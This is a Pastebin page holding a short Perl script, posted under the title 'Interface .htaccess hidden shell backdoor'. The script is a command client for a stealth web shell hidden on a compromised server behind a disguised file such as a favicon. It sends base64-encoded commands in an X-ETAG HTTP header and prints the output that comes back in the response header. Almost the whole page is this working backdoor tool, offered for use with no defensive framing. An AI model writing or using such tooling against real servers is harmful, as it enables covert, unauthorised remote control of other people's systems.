API tools faq
paste
Advertisement
AZZATSSINS_CYBERSERK

Interface .htaccess hidden shell backdoor

AZZATSSINS_CYBERSERK
Apr 8th, 2017
454
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.94 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/perl
  2. # Interface for the mod_php htaccess stealth shell
  3. # https://pastebin.com/raw/vVS0g1Uf
  4.  
  5. use warnings;
  6. use strict;
  7. use MIME::Base64;
  8. use LWP::UserAgent;
  9.  
  10. &usage unless $ARGV [0];
  11. my $url = $ARGV [0];
  12. pop ( @ARGV); #keep readline happy
  13. my $ua = LWP::UserAgent->new;
  14. $ua ->agent( 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US;
  15. rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16' );
  16.  
  17. sub usage {
  18. print "Usage: $0 url\nExample: $0 http://vuln.com/upload/
  19. favicon.ico\n" ;
  20. exit 2;
  21. }
  22.  
  23. my $cmd = '' ;
  24. print "Connecting to shell at $url - type 'exit' to exit" ;
  25. until ( $cmd eq 'exit' ) {
  26. print "\nshell> ";
  27. $cmd = readline;
  28. chomp $cmd ;
  29. my $payload = 'AA' .encode_base64( $cmd );
  30. my $response = $ua ->get( $url , 'X-ETAG' => $payload );
  31. if ($response ->header( 'X-ETAG' )) {
  32. print decode_base64( substr ($response ->header( 'X-ETAG' ),2));
  33. } else {
  34. print "Error! No payload in response!\n" ;
  35. }
  36. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!